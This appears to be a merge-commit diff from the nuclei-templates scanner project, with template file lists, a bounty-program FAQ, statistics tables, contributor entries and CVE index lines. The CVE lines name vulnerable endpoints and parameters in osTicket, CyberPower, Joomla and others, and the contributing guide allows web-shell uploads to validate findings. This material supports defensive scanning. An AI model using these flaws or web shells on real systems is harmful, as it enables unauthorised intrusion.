Merge branch 'main' into patch-17

patch-12
Ritik Chaddha 2024-10-18 18:36:27 +05:30 committed by GitHub
commit feea39c6b6
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
455 changed files with 9354 additions and 6709 deletions


@ -1,69 +1,38 @@
code/cves/2024/CVE-2024-4340.yaml
code/cves/2024/CVE-2024-45409.yaml
http/cves/2017/CVE-2017-5871.yaml
http/cves/2019/CVE-2019-19411.yaml
http/cves/2021/CVE-2021-25094.yaml
http/cves/2021/CVE-2021-40272.yaml
http/cves/2023/CVE-2023-0676.yaml
http/cves/2023/CVE-2023-27641.yaml
http/cves/2023/CVE-2023-39007.yaml
http/cves/2023/CVE-2023-4151.yaml
http/cves/2023/CVE-2023-47105.yaml
http/cves/2024/CVE-2024-3234.yaml
http/cves/2024/CVE-2024-32964.yaml
http/cves/2024/CVE-2024-35627.yaml
http/cves/2024/CVE-2024-3753.yaml
http/cves/2024/CVE-2024-38816.yaml
http/cves/2024/CVE-2024-43160.yaml
http/cves/2024/CVE-2024-43917.yaml
http/cves/2024/CVE-2024-45440.yaml
http/cves/2024/CVE-2024-46627.yaml
http/cves/2024/CVE-2024-4940.yaml
http/cves/2024/CVE-2024-5488.yaml
http/cves/2024/CVE-2024-6517.yaml
http/cves/2024/CVE-2024-7354.yaml
http/cves/2024/CVE-2024-7714.yaml
http/cves/2024/CVE-2024-7854.yaml
http/cves/2024/CVE-2024-8021.yaml
http/cves/2024/CVE-2024-8877.yaml
http/cves/2024/CVE-2024-9463.yaml
http/cves/2024/CVE-2024-9465.yaml
http/default-logins/datagerry/datagerry-default-login.yaml
http/default-logins/netdisco/netdisco-default-login.yaml
http/exposed-panels/dockwatch-panel.yaml
http/exposed-panels/enablix-panel.yaml
http/exposed-panels/gitlab-explore.yaml
http/exposed-panels/gitlab-saml.yaml
http/exposed-panels/loxone-web-panel.yaml
http/exposed-panels/m-bus-panel.yaml
http/exposed-panels/macos-server-panel.yaml
http/exposed-panels/riello-netman204-panel.yaml
http/exposed-panels/rstudio-panel.yaml
http/exposed-panels/saia-pcd-panel.yaml
http/exposed-panels/workspace-one-uem-ssp.yaml
http/exposures/logs/action-controller-exception.yaml
http/exposures/logs/delphi-mvc-exception.yaml
http/exposures/logs/expression-engine-exception.yaml
http/exposures/logs/lua-runtime-error.yaml
http/exposures/logs/mako-runtime-error.yaml
http/exposures/logs/microsoft-runtime-error.yaml
http/exposures/logs/mongodb-exception-page.yaml
http/exposures/logs/sap-logon-error-message.yaml
http/exposures/logs/twig-runtime-error.yaml
http/miscellaneous/seized-site.yaml
http/misconfiguration/ariang-debug-console.yaml
http/misconfiguration/microsoft/aspnetcore-dev-env.yaml
http/misconfiguration/netdisco/netdisco-unauth.yaml
http/technologies/arcgis-detect.yaml
http/technologies/dizquetv-detect.yaml
http/technologies/ivanti-epm-detect.yaml
http/technologies/microsoft/default-azure-function-app.yaml
http/technologies/vertigis-detect.yaml
http/technologies/wiki-js-detect.yaml
http/technologies/windows-communication-foundation-detect.yaml
http/technologies/wordpress/plugins/unlimited-elements-for-elementor.yaml
http/token-spray/api-delighted.yaml
http/token-spray/api-intigriti.yaml
http/token-spray/api-telegram.yaml
http/vulnerabilities/retool/retool-svg-xss.yaml
http/vulnerabilities/wordpress/ninja-forms-xss.yaml
http/cves/2015/CVE-2015-8562.yaml
http/cves/2018/CVE-2018-7192.yaml
http/cves/2018/CVE-2018-7193.yaml
http/cves/2018/CVE-2018-7196.yaml
http/cves/2021/CVE-2021-45811.yaml
http/cves/2023/CVE-2023-1315.yaml
http/cves/2023/CVE-2023-1317.yaml
http/cves/2023/CVE-2023-1318.yaml
http/cves/2024/CVE-2024-32735.yaml
http/cves/2024/CVE-2024-32736.yaml
http/cves/2024/CVE-2024-32737.yaml
http/cves/2024/CVE-2024-32738.yaml
http/cves/2024/CVE-2024-32739.yaml
http/cves/2024/CVE-2024-3656.yaml
http/cves/2024/CVE-2024-39713.yaml
http/cves/2024/CVE-2024-43360.yaml
http/cves/2024/CVE-2024-44349.yaml
http/cves/2024/CVE-2024-45488.yaml
http/cves/2024/CVE-2024-46310.yaml
http/cves/2024/CVE-2024-5910.yaml
http/cves/2024/CVE-2024-8698.yaml
http/default-logins/zebra/zebra-printer-default-login.yaml
http/exposed-panels/freescout-panel.yaml
http/exposed-panels/paloalto-expedition-panel.yaml
http/exposed-panels/sqlpad-panel.yaml
http/exposed-panels/traccar-panel.yaml
http/exposed-panels/txadmin-panel.yaml
http/exposed-panels/usermin-panel.yaml
http/exposed-panels/veritas-netbackup-panel.yaml
http/exposed-panels/vmware-aria-panel.yaml
http/misconfiguration/root-path-disclosure.yaml
http/technologies/accellion-detect.yaml
http/technologies/mirth-connect-detect.yaml
http/technologies/oracle-fusion-detect.yaml
http/technologies/wordpress/plugins/burst-statistics.yaml
http/vulnerabilities/yonyou/yonyou-u8-crm-sqli.yaml
http/vulnerabilities/yonyou/yonyou-u8-crm-tb-sqli.yaml
passive/cves/2024/CVE-2024-40711.yaml


@ -56,6 +56,7 @@ Along with the P.O.C following are the required fields in the info section for s
- If there are more than 1 template for a tech create a separate folder for it
- Don't share any vulnerable URL publicly on Github or Discord channel.
- We should only upload a web shell as a last resort to validate the vulnerability, and if we do upload a file, make sure the file name is random(`{{randstr}}`)
- Do not include code templates for exploits that can be written using HTTP or JavaScript. We avoid adding additional exploit code to the project unless there is an exception.
### **Submitting a PR**

75
Community-Rewards-FAQ.md Normal file

@ -0,0 +1,75 @@
# Nuclei Templates Community Rewards Program - FAQ
## What is the purpose of this rewards program?
The program is designed to reward the community for their efforts in contributing high-quality templates for critical and trending vulnerabilities.
## What are the bounty ranges for template submissions?
Bounties range from **$50 to $250**, depending on the complexity of the template and the effort required.
## Where can I find bounty issues?
Only issues listed by us on our GitHub repository with the 💎 **Bounty** label are eligible for rewards. You can find these bounty issues [here](https://github.com/projectdiscovery/nuclei-templates/issues?q=is%3Aissue%20state%3Aopen%20label%3A%22%F0%9F%92%8E%20Bounty%22)
## What is the acceptance criteria for templates?
Templates must meet the following criteria:
1. **Complete POC**: A full Proof of Concept (POC) must be provided and not rely solely on version detection.
2. **Debug Data**: Include debug data to assist with template validation.
3. **Validation Required**: The template will be reviewed and validated before rewards are given.
4. **Accurate Matchers**: Use strong matchers to avoid false positives.
> **Note**: Triagers will make the final decision on whether a template qualifies for a reward based on validation and the acceptance criteria outlined.
## How do I start working on a bounty issue?
1. **Find an Issue**: Look for issues tagged with 💎 **Bounty**.
2. **Declare Work**: Comment with `/attempt #<issue_number>` to claim the issue.
3. **Submit Work**: Submit your pull request with `/claim #<issue_number>` in the PR description when ready.
## How often are new bounty issues added?
We add new bounty issues on a **weekly basis**, so make sure to check back regularly for fresh opportunities. In the future, you can expect many more bounty issues as the program expands, allowing more opportunities for contributors to participate and earn rewards.
## Can I collaborate with others?
Yes, you can collaborate with other contributors and split rewards by commenting:
```
/claim #<issue_number>
/split @contributor1
/split @contributor2
```
## Is there a limit to how many issues I can work on?
You can work on up to **3 issues** simultaneously.
## What happens if I dont complete an issue on time?
Issues must be completed within **2 months**, or they will be closed.
## How are rewards distributed?
Rewards are distributed once the template is fully validated. If the issue remains unresolved for **few weeks**, the bounty may increase.
## What should I include in my template submission?
Include the following:
- **Complete POC**: A working Proof of Concept.
- **Matchers**: Multiple matchers to prevent false positives.
- **Debug Data**: Data to assist the triage team in validation.
- **Metadata**: Include required fields like `id`, `name`, `author`, `severity`, `description`, and `reference`.
## What types of templates will be rejected?
Templates may be rejected if they:
- Rely solely on version detection.
- Lack a complete POC.
- Contain weak matchers or redundant changes to existing templates.
## What should I avoid when submitting a template?
- Avoid sharing real-world targets publicly.
- Dont submit templates with weak matchers.
- Avoid unnecessary changes to existing templates.
## Is there a leaderboard for contributors?
Yes! We now have a **leaderboard** that showcases top contributors. You can check it out here: [Leaderboard](https://cloud.projectdiscovery.io/templates/leaderboard).
## Is this program permanent?
The rewards program is currently a test run, but we may make changes based on community feedback.
## What additional rewards are available besides bounties?
Beyond bounties, we also reward contributors with:
- **Swag** such as t-shirts and stickers.
- **Invites to security conferences** for standout contributors.
- **Stickers** as a token of appreciation for all first-time contributors, regardless of the bounty.
> Contributors who feel their pull request or issue was overlooked for first-time contributor stickers can ping us on our Discord for assistance: [ProjectDiscovery Discord](https://discord.com/invite/projectdiscovery).


@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------|-------|----------|-------|------|-------|
| cve | 2743 | dhiyaneshdk | 1397 | http | 7977 | info | 3855 | file | 402 |
| panel | 1201 | daffainfo | 866 | file | 402 | high | 2033 | dns | 25 |
| wordpress | 1035 | dwisiswant0 | 802 | cloud | 325 | medium | 1727 | | |
| exposure | 994 | princechaddha | 497 | workflows | 192 | critical | 1145 | | |
| xss | 945 | pussycat0x | 451 | network | 137 | low | 279 | | |
| wp-plugin | 904 | ritikchaddha | 445 | code | 82 | unknown | 43 | | |
| cve | 2773 | dhiyaneshdk | 1420 | http | 8042 | info | 3887 | file | 402 |
| panel | 1212 | daffainfo | 866 | file | 402 | high | 2039 | dns | 25 |
| wordpress | 1046 | dwisiswant0 | 802 | cloud | 325 | medium | 1742 | | |
| exposure | 997 | princechaddha | 498 | workflows | 192 | critical | 1158 | | |
| xss | 956 | ritikchaddha | 455 | network | 137 | low | 280 | | |
| wp-plugin | 915 | pussycat0x | 452 | code | 84 | unknown | 43 | | |
| osint | 807 | pikpikcu | 353 | javascript | 65 | | | | |
| tech | 722 | pdteam | 302 | ssl | 30 | | | | |
| lfi | 712 | ricardomaia | 243 | dast | 25 | | | | |
| misconfig | 710 | geeknik | 231 | dns | 22 | | | | |
| tech | 729 | pdteam | 302 | ssl | 30 | | | | |
| lfi | 713 | ricardomaia | 243 | dast | 25 | | | | |
| misconfig | 713 | geeknik | 231 | dns | 22 | | | | |
**718 directories, 9584 files**.
**723 directories, 9654 files**.
</td>
</tr>

File diff suppressed because one or more lines are too long

File diff suppressed because it is too large Load Diff


@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------|-------|----------|-------|------|-------|
| cve | 2743 | dhiyaneshdk | 1397 | http | 7977 | info | 3855 | file | 402 |
| panel | 1201 | daffainfo | 866 | file | 402 | high | 2033 | dns | 25 |
| wordpress | 1035 | dwisiswant0 | 802 | cloud | 325 | medium | 1727 | | |
| exposure | 994 | princechaddha | 497 | workflows | 192 | critical | 1145 | | |
| xss | 945 | pussycat0x | 451 | network | 137 | low | 279 | | |
| wp-plugin | 904 | ritikchaddha | 445 | code | 82 | unknown | 43 | | |
| cve | 2773 | dhiyaneshdk | 1420 | http | 8042 | info | 3887 | file | 402 |
| panel | 1212 | daffainfo | 866 | file | 402 | high | 2039 | dns | 25 |
| wordpress | 1046 | dwisiswant0 | 802 | cloud | 325 | medium | 1742 | | |
| exposure | 997 | princechaddha | 498 | workflows | 192 | critical | 1158 | | |
| xss | 956 | ritikchaddha | 455 | network | 137 | low | 280 | | |
| wp-plugin | 915 | pussycat0x | 452 | code | 84 | unknown | 43 | | |
| osint | 807 | pikpikcu | 353 | javascript | 65 | | | | |
| tech | 722 | pdteam | 302 | ssl | 30 | | | | |
| lfi | 712 | ricardomaia | 243 | dast | 25 | | | | |
| misconfig | 710 | geeknik | 231 | dns | 22 | | | | |
| tech | 729 | pdteam | 302 | ssl | 30 | | | | |
| lfi | 713 | ricardomaia | 243 | dast | 25 | | | | |
| misconfig | 713 | geeknik | 231 | dns | 22 | | | | |


@ -20,10 +20,10 @@ code:
matchers:
- type: word
words:
- "true"
- "false"
extractors:
- type: dsl
dsl:
- '"AllowUsersToChangePassword Policy is not enabled in your AWS account"'
# digest: 4b0a00483046022100b046545d3c72c54dee9c4051661d61c8241cbce1fb0f655fa4bb1e8461b3f295022100a7bb33ba3ddff07e68db9bd748802715215b8d62be69ab27fab22c5e539cbb28:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100a110f462d8f5e4466b712fd0e894e70d3f25a2880789f42656e9a234f347f0ed022100c3b0fa07fb3f150db61f3c0715c8197371d98a9b4fe21f2837c2243ceb33b064:922c64590222798bb761d5b6d8e72950
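Review bot: The word matcher on `"false"` is a substring match, so it fires on any output that contains that text rather than only when the queried policy value is false; the command that produces the output sits above this hunk, so whether it narrows the output to the single AllowUsersToChangePassword field cannot be confirmed from here. This reading assumes `- "false"` is the new side, since the rendering has dropped the +/- markers. If the output is a bare boolean, a comment above the matcher would make the polarity explicit, for example `# output "false" means users cannot change their own password, which is the reported finding`. It is also worth confirming what the template reports when the account has no password policy at all and the CLI call errors, because then neither "true" nor "false" appears and the check stays silent.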


@ -1438,7 +1438,8 @@
"website": "https://pwn.by/noraj",
"email": ""
}
},{
},
{
"author": "mabdullah22",
"links": {
"github": "https://www.github.com/maabdullah22",
@ -1447,5 +1448,26 @@
"website": "",
"email": ""
}
},
{
"author": "rxerium",
"links": {
"github": "https://www.github.com/rxerium",
"twitter": "https://twitter.com/rxerium",
"linkedin": "",
"website": "https://rxerium.com",
"email": "rishi@rxerium.com"
}
},
{
"author": "edoardottt",
"links": {
"github": "https://github.com/edoardottt",
"twitter": "https://twitter.com/edoardottt2",
"linkedin": "https://www.linkedin.com/in/edoardoottavianelli/",
"website": "https://edoardoottavianelli.it/",
"email": ""
}
}
]


@ -317,6 +317,7 @@
{"ID":"CVE-2015-7823","Info":{"Name":"Kentico CMS 8.2 - Open Redirect","Severity":"medium","Description":"Kentico CMS 8.2 contains an open redirect vulnerability via GetDocLink.ashx with link variable. An attacker can construct a URL within the application that causes a redirection to an arbitrary external domain.","Classification":{"CVSSScore":"5.8"}},"file_path":"http/cves/2015/CVE-2015-7823.yaml"}
{"ID":"CVE-2015-8349","Info":{"Name":"SourceBans \u003c2.0 - Cross-Site Scripting","Severity":"medium","Description":"SourceBans before 2.0 contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the advSearch parameter to index.php.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2015/CVE-2015-8349.yaml"}
{"ID":"CVE-2015-8399","Info":{"Name":"Atlassian Confluence \u003c5.8.17 - Information Disclosure","Severity":"medium","Description":"Atlassian Confluence before 5.8.17 contains an information disclsoure vulnerability. A remote authenticated user can read configuration files via the decoratorName parameter to (1) spaces/viewdefaultdecorator.action or (2) admin/viewdefaultdecorator.action.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-8399.yaml"}
{"ID":"CVE-2015-8562","Info":{"Name":"Joomla HTTP Header Unauthenticated - Remote Code Execution","Severity":"high","Description":"Joomla! 1.5.x, 2.x, and 3.x before 3.4.6 allow remote attackers to conduct PHP object injection attacks and execute arbitrary PHP code via the HTTP User-Agent header, as exploited in the wild in December 2015\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-8562.yaml"}
{"ID":"CVE-2015-8813","Info":{"Name":"Umbraco \u003c7.4.0- Server-Side Request Forgery","Severity":"high","Description":"Umbraco before version 7.4.0 contains a server-side request forgery vulnerability in feedproxy.aspx that allows attackers to send arbitrary HTTP GET requests via http://local/Umbraco/feedproxy.aspx?url=http://127.0.0.1:80/index.","Classification":{"CVSSScore":"8.2"}},"file_path":"http/cves/2015/CVE-2015-8813.yaml"}
{"ID":"CVE-2015-9312","Info":{"Name":"NewStatPress \u003c=1.0.4 - Cross-Site Scripting","Severity":"medium","Description":"WordPress NewStatPress plugin through 1.0.4 contains a cross-site scripting vulnerability. The plugin utilizes, on lines 28 and 31 of the file \"includes/nsp_search.php\", several variables from the $_GET scope without sanitation. While WordPress automatically escapes quotes on this scope, the outputs on these lines are outside of quotes, and as such can be utilized to initiate a cross-site scripting attack.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2015/CVE-2015-9312.yaml"}
{"ID":"CVE-2015-9323","Info":{"Name":"404 to 301 \u003c= 2.0.2 - Authenticated Blind SQL Injection","Severity":"critical","Description":"The 404 to 301 Redirect, Log and Notify 404 Errors WordPress plugin was affected by an Authenticated Blind SQL Injection security vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2015/CVE-2015-9323.yaml"}
@ -628,6 +629,9 @@
{"ID":"CVE-2018-6530","Info":{"Name":"D-Link - Unauthenticated Remote Code Execution","Severity":"critical","Description":"OS command injection vulnerability in soap.cgi (soapcgi_main in cgibin) in D-Link DIR-880L DIR-880L_REVA_FIRMWARE_PATCH_1.08B04 and previous versions, DIR-868L DIR868LA1_FW112b04 and previous versions, DIR-65L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and previous versions, and DIR-860L DIR860LA1_FW110b04 and previous versions allows remote attackers to execute arbitrary OS commands via the service parameter.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-6530.yaml"}
{"ID":"CVE-2018-6605","Info":{"Name":"Joomla! Component Zh BaiduMap 3.0.0.1 - SQL Injection","Severity":"critical","Description":"SQL Injection exists in the Zh BaiduMap 3.0.0.1 component for Joomla! via the id parameter in a getPlacemarkDetails, getPlacemarkHoverText, getPathHoverText, or getPathDetails request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-6605.yaml"}
{"ID":"CVE-2018-6910","Info":{"Name":"DedeCMS 5.7 - Path Disclosure","Severity":"high","Description":"DedeCMS 5.7 allows remote attackers to discover the full path via a direct request for include/downmix.inc.php or inc/inc_archives_functions.php","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-6910.yaml"}
{"ID":"CVE-2018-7192","Info":{"Name":"osTicket \u003c 1.10.2 - Cross-Site Scripting","Severity":"medium","Description":"Cross-site scripting (XSS) vulnerability in /ajax.php/form/help-topic in Enhancesoft osTicket before 1.10.2 allows remote attackers to inject arbitrary web script or HTML via the \"message\" parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2018/CVE-2018-7192.yaml"}
{"ID":"CVE-2018-7193","Info":{"Name":"osTicket \u003c 1.10.2 - Cross-Site Scripting","Severity":"medium","Description":"Cross-site scripting (XSS) vulnerability in /scp/directory.php in Enhancesoft osTicket before 1.10.2 allows remote attackers to inject arbitrary web script or HTML via the \"order\" parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2018/CVE-2018-7193.yaml"}
{"ID":"CVE-2018-7196","Info":{"Name":"osTicket \u003c 1.10.2 - Cross-Site Scripting","Severity":"medium","Description":"Cross-site scripting (XSS) vulnerability in /scp/index.php in Enhancesoft osTicket before 1.10.2 allows remote attackers to inject arbitrary web script or HTML via the \"sort\" parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2018/CVE-2018-7196.yaml"}
{"ID":"CVE-2018-7251","Info":{"Name":"Anchor CMS 0.12.3 - Error Log Exposure","Severity":"critical","Description":"Anchor CMS 0.12.3 is susceptible to an error log exposure vulnerability due to an issue in config/error.php. The error log is exposed at an errors.log URI, and contains MySQL credentials if a MySQL error (such as \"Too many connections\") has occurred.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-7251.yaml"}
{"ID":"CVE-2018-7282","Info":{"Name":"TITool PrintMonitor - Blind SQL Injection","Severity":"critical","Description":"The username parameter of the TITool PrintMonitor solution during the login request is vulnerable to and/or time-based blind SQLi.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-7282.yaml"}
{"ID":"CVE-2018-7314","Info":{"Name":"Joomla! Component PrayerCenter 3.0.2 - SQL Injection","Severity":"critical","Description":"SQL Injection exists in the PrayerCenter 3.0.2 component for Joomla! via the sessionid parameter, a different vulnerability than CVE-2008-6429.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-7314.yaml"}
@ -1501,6 +1505,7 @@
{"ID":"CVE-2021-45382","Info":{"Name":"D-Link - Remote Command Execution","Severity":"critical","Description":"A Remote Command Execution (RCE) vulnerability exists in all series H/W revisions D-link DIR-810L, DIR-820L/LW, DIR-826L, DIR-830L, and DIR-836L routers via the DDNS function in ncc2 binary file\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-45382.yaml"}
{"ID":"CVE-2021-45422","Info":{"Name":"Reprise License Manager 14.2 - Cross-Site Scripting","Severity":"medium","Description":"Reprise License Manager 14.2 contains a cross-site scripting vulnerability in the /goform/activate_process \"count\" parameter via GET.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-45422.yaml"}
{"ID":"CVE-2021-45428","Info":{"Name":"Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Upload","Severity":"critical","Description":"TLR-2005KSH is affected by an incorrect access control vulnerability. THe PUT method is enabled so an attacker can upload arbitrary files including HTML and CGI formats.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-45428.yaml"}
{"ID":"CVE-2021-45811","Info":{"Name":"osTicket 1.15.x - SQL Injection","Severity":"medium","Description":"A SQL injection vulnerability in the \"Search\" functionality of \"tickets.php\" page in osTicket 1.15.x allows authenticated attackers to execute arbitrary SQL commands via the \"keywords\" and \"topic_id\" URL parameters combination.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2021/CVE-2021-45811.yaml"}
{"ID":"CVE-2021-45967","Info":{"Name":"Pascom CPS Server-Side Request Forgery","Severity":"critical","Description":"Pascom versions before 7.20 packaged with Cloud Phone System contain a known server-side request forgery vulnerability.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-45967.yaml"}
{"ID":"CVE-2021-45968","Info":{"Name":"Pascom CPS - Local File Inclusion","Severity":"high","Description":"Pascom packaged with Cloud Phone System (CPS) versions before 7.20 contain a known local file inclusion vulnerability.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-45968.yaml"}
{"ID":"CVE-2021-46005","Info":{"Name":"Sourcecodester Car Rental Management System 1.0 - Stored Cross-Site Scripting","Severity":"medium","Description":"Sourcecodester Car Rental Management System 1.0 is vulnerable to cross-site scripting via the vehicalorcview parameter.","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2021/CVE-2021-46005.yaml"}
@ -2020,6 +2025,9 @@
{"ID":"CVE-2023-1080","Info":{"Name":"WordPress GN Publisher \u003c1.5.6 - Cross-Site Scripting","Severity":"medium","Description":"WordPress GN Publisher plugin before 1.5.6 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-1080.yaml"}
{"ID":"CVE-2023-1177","Info":{"Name":"Mlflow \u003c2.2.1 - Local File Inclusion","Severity":"critical","Description":"Mlflow before 2.2.1 is susceptible to local file inclusion due to path traversal \\..\\filename in GitHub repository mlflow/mlflow. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-1177.yaml"}
{"ID":"CVE-2023-1263","Info":{"Name":"Coming Soon \u0026 Maintenance \u003c 4.1.7 - Unauthenticated Post/Page Access","Severity":"medium","Description":"The plugin does not restrict access to published and non protected posts/pages when the maintenance mode is enabled, allowing unauthenticated users to access them.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-1263.yaml"}
{"ID":"CVE-2023-1315","Info":{"Name":"osTicket \u003c v1.16.6 - Cross-Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository osticket/osticket prior to v1.16.6.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-1315.yaml"}
{"ID":"CVE-2023-1317","Info":{"Name":"osTicket \u003c v1.16.6 - Cross-Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository osticket/osticket prior to v1.16.6.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-1317.yaml"}
{"ID":"CVE-2023-1318","Info":{"Name":"osTicket \u003c v1.16.6 - Cross-Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Generic in GitHub repository osticket/osticket prior to v1.16.6.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-1318.yaml"}
{"ID":"CVE-2023-1362","Info":{"Name":"unilogies/bumsys \u003c v2.0.2 - Clickjacking","Severity":"medium","Description":"This template checks for the presence of clickjacking prevention headers in the HTTP response, aiming to identify vulnerabilities related to the improper restriction of rendered UI layers or frames in the GitHub repository unilogies/bumsys prior to version 2.0.2.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-1362.yaml"}
{"ID":"CVE-2023-1408","Info":{"Name":"Video List Manager \u003c= 1.7 - SQL Injection","Severity":"high","Description":"The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2023/CVE-2023-1408.yaml"}
{"ID":"CVE-2023-1434","Info":{"Name":"Odoo - Cross-Site Scripting","Severity":"medium","Description":"Odoo is a business suite that has features for many business-critical areas, such as e-commerce, billing, or CRM. Versions before the 16.0 release are vulnerable to CVE-2023-1434 and is caused by an incorrect content type being set on an API endpoint.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-1434.yaml"}
@ -2529,6 +2537,11 @@
{"ID":"CVE-2024-32651","Info":{"Name":"Change Detection - Server Side Template Injection","Severity":"critical","Description":"A Server Side Template Injection in changedetection.io caused by usage of unsafe functions of Jinja2 allows Remote Command Execution on the server host.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-32651.yaml"}
{"ID":"CVE-2024-32709","Info":{"Name":"WP-Recall \u003c= 16.26.5 - SQL Injection","Severity":"critical","Description":"The WP-Recall Registration, Profile, Commerce \u0026 More plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 16.26.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.3"}},"file_path":"http/cves/2024/CVE-2024-32709.yaml"}
{"ID":"CVE-2024-3273","Info":{"Name":"D-Link Network Attached Storage - Command Injection and Backdoor Account","Severity":"critical","Description":"UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, was found in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L up to 20240403. Affected is an unknown function of the file /cgi-bin/nas_sharing.cgi of the component HTTP GET Request Handler. The manipulation of the argument system leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259284. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-3273.yaml"}
{"ID":"CVE-2024-32735","Info":{"Name":"CyberPower - Missing Authentication","Severity":"critical","Description":"An issue regarding missing authentication for certain utilities exists in CyberPower PowerPanel Enterprise prior to v2.8.3.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-32735.yaml"}
{"ID":"CVE-2024-32736","Info":{"Name":"CyberPower \u003c v2.8.3 - SQL Injection","Severity":"high","Description":"A sql injection vulnerability exists in CyberPower PowerPanel Enterprise prior to .\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-32736.yaml"}
{"ID":"CVE-2024-32737","Info":{"Name":"CyberPower - SQL Injection","Severity":"high","Description":"A sql injection vulnerability exists in CyberPower PowerPanel Enterprise prior to v2.8.3.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-32737.yaml"}
{"ID":"CVE-2024-32738","Info":{"Name":"CyberPower - SQL Injection","Severity":"high","Description":"A sql injection vulnerability exists in CyberPower PowerPanel Enterprise prior to v2.8.3.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-32738.yaml"}
{"ID":"CVE-2024-32739","Info":{"Name":"CyberPower \u003c v2.8.3 - SQL Injection","Severity":"high","Description":"A sql injection vulnerability exists in CyberPower PowerPanel Enterprise prior to v2.8.3.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-32739.yaml"}
{"ID":"CVE-2024-3274","Info":{"Name":"D-LINK DNS-320L,DNS-320LW and DNS-327L - Information Disclosure","Severity":"medium","Description":"A vulnerability has been found in D-Link DNS-320L, DNS-320LW and DNS-327L up to 20240403 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /cgi-bin/info.cgi of the component HTTP GET Request Handler.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-3274.yaml"}
